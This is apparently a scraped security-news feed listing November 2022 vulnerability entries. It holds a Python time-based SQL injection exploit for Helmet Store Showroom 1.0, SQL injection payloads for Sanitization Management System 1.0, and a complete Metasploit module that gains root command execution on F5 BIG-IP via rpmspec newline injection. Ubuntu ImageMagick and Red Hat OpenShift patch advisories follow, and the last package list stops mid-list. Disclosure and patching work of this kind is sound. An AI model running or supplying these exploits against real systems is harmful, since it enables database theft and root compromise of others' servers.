Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Date: 25-11-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.import requestsimport sysimport pyfigletsess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")    def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")    def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")    if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1)login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

Helmet Store Showroom 1.0 SQL Injection

Sanitization Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi## Author: nu11secur1ty## Date: 11.25.2022## Vendor: https://github.com/oretnom23,https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The attacker can get all information from this system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQLParameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: p=services/view_service&id=126664801' or '5968'='5975' ORNOT 5461=5461 AND 'gEud'='gEud    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=services/view_service&id=126664801' or '5968'='5975' OR(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=services/view_service&id=126664801' or '5968'='5975'AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/rnfvjf)## Time spent`00:30:00`

Sanitization Management System 1.0 SQL Injection

Chrome suffers from a heap use-after-free vulnerability in blink::LocalFrameView::PerformLayout due to an incomplete fix for CVE-2022-3199.

Chrome blink::LocalFrameView::PerformLayout Use-After-Free

XNU suffers from a vm_object use-after-free vulnerability due to invalid error handling in vm_map_enter.

XNU vm_object Use-After-Free

XNU suffers from a dangling PTE entry due to integer truncation when collapsing vm_object shadow chains.

XNU Dangling PTE Entry

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.

Falco 0.33.1

This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',        'Description' => %q{          This module exploits a newline injection into an RPM .rpmspec file          that permits authenticated users to remotely execute commands.          Successful exploitation results in remote code execution          as the root user.        },        'Author' => [          'Ron Bowes' # Discovery, PoC, and module        ],        'References' => [          ['CVE', '2022-41800'],          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],          ['URL', 'https://support.f5.com/csp/article/K13325942'],        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-11-16', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => true,        'Targets' => [          [ 'Default', {} ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION], # One at a time          'SideEffects' => [            IOC_IN_LOGS,            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),        OptString.new('HttpPassword', [true, 'iControl password', ''])      ]    )  end  def exploit    # The RPM name is based on these, so we need these to delete the RPM file after    name = rand_text_alphanumeric(5..10)    version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"    release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"    vprint_status('Creating an .rpmspec file on the target...')    result = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'data' => {        'specFileData' => {          'name' => name,          'srcBasePath' => '/tmp',          'version' => version,          'release' => release,          # This is the injection - add newlines then a '%check' section          'description' => "\n\n%check\n#{payload.encoded}\n",          'summary' => rand_text_alphanumeric(5..10)        }      }.to_json    })    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200    json = result&.get_json_document    fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json    file_path = json['specFilePath']    fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path    vprint_status("Created spec file: #{file_path}")    register_file_for_cleanup(file_path)    # We can also use `exit 1` in the %check function to prevent this file    # from being created, rather than cleaning it up.. but that seems noisier?    # Neither option gets logged so /shrug    register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")    vprint_status('Building the RPM to trigger the payload...')    result = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'data' => {        'state' => {},        'appName' => rand_text_alphanumeric(5..10),        'packageDirectory' => '/tmp',        'specFilePath' => file_path      }.to_json    })    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299  endend

F5 BIG-IP iControl Remote Command Execution

Ubuntu Security Notice 5736-1 - It was discovered that ImageMagick incorrectly handled certain values when processing PDF files. If a user or automated system using ImageMagick were tricked into opening a specially crafted PDF file, an attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 LTS. Zhang Xiaohui discovered that ImageMagick incorrectly handled certain values when processing image data. If a user or automated system using ImageMagick were tricked into opening a specially crafted image, an attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 18.04 LTS and Ubuntu 22.10.

==========================================================================  
Ubuntu Security Notice USN-5736-1  
November 24, 2022

imagemagick vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in ImageMagick.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

It was discovered that ImageMagick incorrectly handled certain values  
when processing PDF files. If a user or automated system using ImageMagick  
were tricked into opening a specially crafted PDF file, an attacker could  
exploit this to cause a denial of service. This issue only affected Ubuntu  
14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 LTS. (CVE-2021-20224)

Zhang Xiaohui discovered that ImageMagick incorrectly handled certain  
values when processing image data. If a user or automated system using  
ImageMagick were tricked into opening a specially crafted image, an  
attacker could exploit this to cause a denial of service. This issue only  
affected Ubuntu 18.04 LTS and Ubuntu 22.10. (CVE-2021-20241)

Zhang Xiaohui discovered that ImageMagick incorrectly handled certain  
values when processing image data. If a user or automated system using  
ImageMagick were tricked into opening a specially crafted image, an  
attacker could exploit this to cause a denial of service. This issue only  
affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 22.10.  
(CVE-2021-20243)

It was discovered that ImageMagick incorrectly handled certain values  
when processing visual effects based image files. By tricking a user into  
opening a specially crafted image file, an attacker could crash the  
application causing a denial of service. This issue only affected Ubuntu  
22.10. (CVE-2021-20244)

It was discovered that ImageMagick could be made to divide by zero when  
processing crafted file. By tricking a user into opening a specially  
crafted image file, an attacker could crash the application causing a  
denial of service. This issue only affected Ubuntu 22.10. (CVE-2021-20245)

It was discovered that ImageMagick incorrectly handled certain values  
when performing resampling operations. By tricking a user into opening  
a specially crafted image file, an attacker could crash the application  
causing a denial of service. This issue only affected Ubuntu 22.10.  
(CVE-2021-20246)

It was discovered that ImageMagick incorrectly handled certain values  
when processing visual effects based image files. By tricking a user into  
opening a specially crafted image file, an attacker could crash the  
application causing a denial of service. This issue only affected Ubuntu  
22.10. (CVE-2021-20309)

It was discovered that ImageMagick incorrectly handled certain values  
when processing thumbnail image data. By tricking a user into opening  
a specially crafted image file, an attacker could crash the application  
causing a denial of service. This issue only affected Ubuntu 22.10.  
(CVE-2021-20312)

It was discovered that ImageMagick incorrectly handled memory cleanup  
when performing certain cryptographic operations. Under certain conditions  
sensitive cryptographic information could be disclosed. This issue only  
affected Ubuntu 22.10. (CVE-2021-20313)

It was discovered that ImageMagick did not properly manage memory under  
certain circumstances. If a user were tricked into opening a specially  
crafted file using convert command, an attacker could possibly use this  
issue to cause ImageMagick to crash, resulting in a denial of service. This  
issue only affected Ubuntu 22.10. (CVE-2021-3574)

It was discovered that ImageMagick did not use the correct rights when  
specifically excluded by a module policy. An attacker could use this issue  
to read and write certain restricted files. This issue only affected  
Ubuntu 22.10. (CVE-2021-39212)

It was discovered that ImageMagick incorrectly handled certain values        
when processing specially crafted SVG files. By tricking a user into    
opening a specially crafted SVG file, an attacker could crash the          
application causing a denial of service. This issue only affected Ubuntu     
22.10. (CVE-2021-4219)

It was discovered that ImageMagick did not properly manage memory under      
certain circumstances. If a user were tricked into opening a specially       
crafted DICOM file, an attacker could possibly use this issue to cause  
ImageMagick to crash, resulting in a denial of service or leaking sensitive  
information. This issue only affected Ubuntu 22.10. (CVE-2022-1114)

It was discovered that ImageMagick incorrectly handled memory under  
certain circumstances. If a user were tricked into opening a specially  
crafted image file, an attacker could possibly exploit this issue to cause  
a denial of service or other unspecified impact. This issue only affected  
Ubuntu 22.10. (CVE-2022-28463)

It was discovered that ImageMagick incorrectly handled certain values.  
If a user were tricked into processing a specially crafted image file,  
an attacker could possibly exploit this issue to cause a denial of service  
or other unspecified impact. This issue only affected Ubuntu 14.04 ESM,  
Ubuntu 18.04 LTS and Ubuntu 22.10. (CVE-2022-32545, CVE-2022-32546)

It was discovered that ImageMagick incorrectly handled memory under  
certain circumstances. If a user were tricked into processing a specially  
crafted image file, an attacker could possibly exploit this issue to cause  
a denial of service or other unspecified impact. This issue only affected  
Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 22.10. (CVE-2022-32547)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  imagemagick-6-common            8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  imagemagick-6.q16hdri           8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  imagemagick-common              8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libimage-magick-perl            8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libimage-magick-q16-perl        8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagick++-6.q16-dev           8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagick++-6.q16hdri-8         8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagick++-dev                 8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-6-arch-config     8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-6.q16-6-extra     8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickcore-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickwand-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickwand-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  libmagickwand-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  perlmagick                      8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1

Ubuntu 18.04 LTS:  
  imagemagick                     8:6.9.7.4+dfsg-16ubuntu6.14  
  imagemagick-6-common            8:6.9.7.4+dfsg-16ubuntu6.14  
  imagemagick-6.q16               8:6.9.7.4+dfsg-16ubuntu6.14  
  imagemagick-6.q16hdri           8:6.9.7.4+dfsg-16ubuntu6.14  
  imagemagick-common              8:6.9.7.4+dfsg-16ubuntu6.14  
  libimage-magick-perl            8:6.9.7.4+dfsg-16ubuntu6.14  
  libimage-magick-q16-perl        8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagick++-6.q16-7             8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagick++-6.q16-dev           8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagick++-6.q16hdri-7         8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagick++-dev                 8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-6-arch-config     8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-6-headers         8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-6.q16-3           8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-6.q16-3-extra     8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-6.q16-dev         8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-6.q16hdri-3       8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickcore-dev               8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickwand-6.q16-3           8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickwand-6.q16-dev         8:6.9.7.4+dfsg-16ubuntu6.14  
  libmagickwand-dev               8:6.9.7.4+dfsg-16ubuntu6.14  
  perlmagick                      8:6.9.7.4+dfsg-16ubuntu6.14

Ubuntu 16.04 ESM:  
  imagemagick                     8:6.8.9.9-7ubuntu5.16+esm5  
  imagemagick-6.q16               8:6.8.9.9-7ubuntu5.16+esm5  
  imagemagick-common              8:6.8.9.9-7ubuntu5.16+esm5  
  libimage-magick-perl            8:6.8.9.9-7ubuntu5.16+esm5  
  libimage-magick-q16-perl        8:6.8.9.9-7ubuntu5.16+esm5  
  libmagick++-6.q16-5v5           8:6.8.9.9-7ubuntu5.16+esm5  
  libmagick++-6.q16-dev           8:6.8.9.9-7ubuntu5.16+esm5  
  libmagick++-dev                 8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickcore-6-arch-config     8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickcore-6-headers         8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickcore-6.q16-2           8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickcore-6.q16-2-extra     8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickcore-6.q16-dev         8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickcore-dev               8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickwand-6.q16-2           8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickwand-6.q16-dev         8:6.8.9.9-7ubuntu5.16+esm5  
  libmagickwand-dev               8:6.8.9.9-7ubuntu5.16+esm5  
  perlmagick                      8:6.8.9.9-7ubuntu5.16+esm5

Ubuntu 14.04 ESM:  
  imagemagick                     8:6.7.7.10-6ubuntu3.13+esm3  
  imagemagick-common              8:6.7.7.10-6ubuntu3.13+esm3  
  libmagick++-dev                 8:6.7.7.10-6ubuntu3.13+esm3  
  libmagick++5                    8:6.7.7.10-6ubuntu3.13+esm3  
  libmagickcore-dev               8:6.7.7.10-6ubuntu3.13+esm3  
  libmagickcore5                  8:6.7.7.10-6ubuntu3.13+esm3  
  libmagickcore5-extra            8:6.7.7.10-6ubuntu3.13+esm3  
  libmagickwand-dev               8:6.7.7.10-6ubuntu3.13+esm3  
  libmagickwand5                  8:6.7.7.10-6ubuntu3.13+esm3  
  perlmagick                      8:6.7.7.10-6ubuntu3.13+esm3

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5736-1  
  CVE-2021-20224, CVE-2021-20241, CVE-2021-20243, CVE-2021-20244,  
  CVE-2021-20245, CVE-2021-20246, CVE-2021-20309, CVE-2021-20312,  
  CVE-2021-20313, CVE-2021-3574, CVE-2021-39212, CVE-2021-4219,  
  CVE-2022-1114, CVE-2022-28463, CVE-2022-32545, CVE-2022-32546,  
  CVE-2022-32547

Package Information:  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.10.1  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.7.4+dfsg-16ubuntu6.14

Ubuntu Security Notice USN-5736-1

Red Hat Security Advisory 2022-8535-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.16. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.16 security update  
Advisory ID:       RHSA-2022:8535-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8535  
Issue date:        2022-11-24  
CVE Names:         CVE-2022-27664 CVE-2022-32189  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.16 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.16. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2022:8534

Security Fix(es):

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel.

To check for available updates, use the OpenShift Console or the CLI oc  
command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures.

The image digests may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:01c9ef7f802f0ba254847c22e960cd6453ed9f61d9296fdda8bd497712f53e23

(For s390x architecture)  
The image digest is  
sha256:8e2adb075d0666881cbd360c679d9fdc893e797c64480bca8db50956a415105e

(For ppc64le architecture)  
The image digest is  
sha256:598ace9ac33904216a9506d81f6dd7d56e7ca66a7d849e43cb58304f8eb738ef

(For aarch64 architecture)  
The image digest is  
sha256:e4bb06fe2b63bf2776e529d97202ae7615bdee9811ce10a737052c11d8cd7e83

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2075126 - validate and report error during kernelArguments mismatch  
2102241 - [OVN HWOL] Avoid masked access to ct_label to allow offloading of ECMP symmetric reply and load balanced traffic  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-1790 - [4.11] Users can't silence alerts from the dev console when dedicated UWM Alertmanager is deployed  
OCPBUGS-1847 - Image registry panics while deploying OCP in me-central-1 AWS region  
OCPBUGS-2925 - lldp filtering not working at capture  
OCPBUGS-2983 - [RFE] 4.11 Azure DiskEncryptionSet static validation does not support upper-case letters  
OCPBUGS-3190 - OpenShift webconsole , metrics tab does not display data  
OCPBUGS-3197 - [4.11.z backport][4.8][OVN] RHEL 7.9 DHCP worker ovs-configuration fails  
OCPBUGS-3260 - bump fedora-coreos-config submodule

6. References:

https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY38VZdzjgjWX9erEAQhIJw//SwAEM8cZCRB8h1l8oiMwOx5LU6pje2gt  
tk3QTMZBh8GKiFWgmBjgXBKzJsNsFuug0vsOLjS7qcH0sf7mDDj81zMvkvyt3tZy  
dB0y2DzCJMViyE7j5BSOCBY8Neh9ROD1F7GMCjeuMHQTlPrPU2sy/K5VbJ79uxA2  
kKFB8f23F5/mbaur+M7pbUnt7Gm7n2aDtHhQnq194RiLJXMjusqtSRny3Xff/m6B  
nEUWiUUBfgRK9WRRO3Usn3eodajWjDbDRrN4t4kKF2syGXkcQGHvkgaWXA4nH2cD  
m0a0WCqeQJIeNfKwJmkJH471CCwq3tdJjN2/Heb4NRoVSTiPqFj7TPcgoTtSjtRq  
K1cxFb1AIQI5hYasW/BOSHLyUxPAWzfvJtZiQu4XtXqJrU8sSmcWIjw9oATTlNYo  
hPl/zqM2FX4yd+HffeaUVSJf0rModygmEr6DeOO3iZxmK2KAZmhndjUJWopyr/00  
0jTihxdtPETdCMVvyiYz/Ie6Nbra1nwP10GRckBCpiZv9VnPSHKOhCikvahKqWZv  
ajXO+KQSgbwS23wHGOnsc0DR+cKKpfI5REf9F7WhA3Srjkyw7lfPuDsD8WaUvCXl  
1VOINPL/gyU2ADS1O0lc4W1mTTCahBHPnnpknuSTXcqnTgZdYsyN7A9Vdg+T9DTp  
IEQyQC4d9Nk¬i3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8535-01

Red Hat Security Advisory 2022-8534-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.16. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Low: OpenShift Container Platform 4.11.16 security update  
Advisory ID:       RHSA-2022:8534-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8534  
Issue date:        2022-11-24  
CVE Names:         CVE-2022-32189  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.16 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.11 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.11.16. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2022:8535

Security Fix(es):

* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Solution:

See the following documentation, which will be updated shortly for this  
release, for important instructions on how to upgrade your cluster and  
fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service

6. Package List:

Red Hat OpenShift Container Platform 4.11:

Source:  
atomic-openshift-service-idler-4.11.0-202211072116.p0.ga0f9090.assembly.stream.el8.src.rpm  
butane-0.15.0-3.rhaos4.11.el8.src.rpm  
openshift-4.11.0-202211072116.p0.g5157800.assembly.stream.el8.src.rpm  
openshift-ansible-4.11.0-202211072116.p0.gdf73941.assembly.stream.el8.src.rpm  
openshift-clients-4.11.0-202211072116.p0.g142cb44.assembly.stream.el8.src.rpm  
openshift-kuryr-4.11.0-202211072116.p0.g93daed6.assembly.stream.el8.src.rpm  
openvswitch2.17-2.17.0-62.el8fdp.src.rpm

aarch64:  
atomic-openshift-service-idler-4.11.0-202211072116.p0.ga0f9090.assembly.stream.el8.aarch64.rpm  
butane-0.15.0-3.rhaos4.11.el8.aarch64.rpm  
butane-debuginfo-0.15.0-3.rhaos4.11.el8.aarch64.rpm  
butane-debugsource-0.15.0-3.rhaos4.11.el8.aarch64.rpm  
network-scripts-openvswitch2.17-2.17.0-62.el8fdp.aarch64.rpm  
openshift-clients-4.11.0-202211072116.p0.g142cb44.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.11.0-202211072116.p0.g5157800.assembly.stream.el8.aarch64.rpm  
openvswitch2.17-2.17.0-62.el8fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-62.el8fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-62.el8fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-62.el8fdp.aarch64.rpm  
